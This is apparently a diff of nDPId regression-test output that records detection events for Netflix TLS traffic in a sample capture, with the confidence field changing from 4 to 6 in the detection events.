00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1484319032986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032986,"pkt":"gCqoTGHM5JjWH70UCABFAABAdf5AAEAGCsbAqAEHNCDEJM98AbvweU0rAAAAALAC\/\/+WPwAAAgQFtAEDAwUBAQgKH2S4iAAAAAAEAgAA"} 
-00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032888,"flow_last_seen":1484319032990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319032990,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032888,"flow_last_seen":1484319032991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319032991,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec 
Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032896,"flow_last_seen":1484319033008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319033008,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032896,"flow_last_seen":1484319033017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319033017,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032888,"flow_last_seen":1484319032990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319032990,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} 
+01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032888,"flow_last_seen":1484319032991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319032991,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032896,"flow_last_seen":1484319033008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319033008,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032896,"flow_last_seen":1484319033017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319033017,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1484319033029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033029,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGl6g0IMQkwKgBBwG7z3ve3c1cx8tKb6ASRepkbwAAAgQFtAQCCAq2m8VuH2S4hgEDAwg="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1484319033032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033032,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z3xLWYWT8HlNLKASReoUTgAAAgQFtAQCCAq2m8VvH2S4iAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1484319033032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033032,"pkt":"gCqoTGHM5JjWH70UCABFAAA0rMBAAEAG1A\/AqAEHNCDEJM97AbvHy0pv3t3NXYAQEBXI5wAAAQEICh9kuLC2m8Vu"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032984,"flow_last_seen":1484319033033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033033,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032984,"flow_last_seen":1484319033033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033033,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1484319033038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033038,"pkt":"gCqoTGHM5JjWH70UCABFAAA0iIJAAEAG+E3AqAEHNCDEJM98AbvweU0sS1mFlIAQEBV4xgAAAQEICh9kuLK2m8Vv"} 
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032986,"flow_last_seen":1484319033038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033038,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032984,"flow_last_seen":1484319033086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033086,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032984,"flow_last_seen":1484319033087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033087,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032986,"flow_last_seen":1484319033098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033098,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032986,"flow_last_seen":1484319033112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033112,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} 
+00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032986,"flow_last_seen":1484319033038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033038,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032984,"flow_last_seen":1484319033086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033086,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032984,"flow_last_seen":1484319033087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033087,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032986,"flow_last_seen":1484319033098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033098,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032986,"flow_last_seen":1484319033112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033112,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033206,"flow_last_seen":1484319033206,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033206,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1484319033206,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033206,"pkt":"gCqoTGHM5JjWH70UCABFAABAagpAAEAGFrrAqAEHNCDEJM99AbszkZRgAAAAALAC\/\/8LKQAAAgQFtAEDAwUBAQgKH2S5UQAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1484319033258,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033258,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z33SmoRGM5GUYaASReoDCgAAAgQFtAQCCAq2m8WoH2S5UQEDAwg="} 
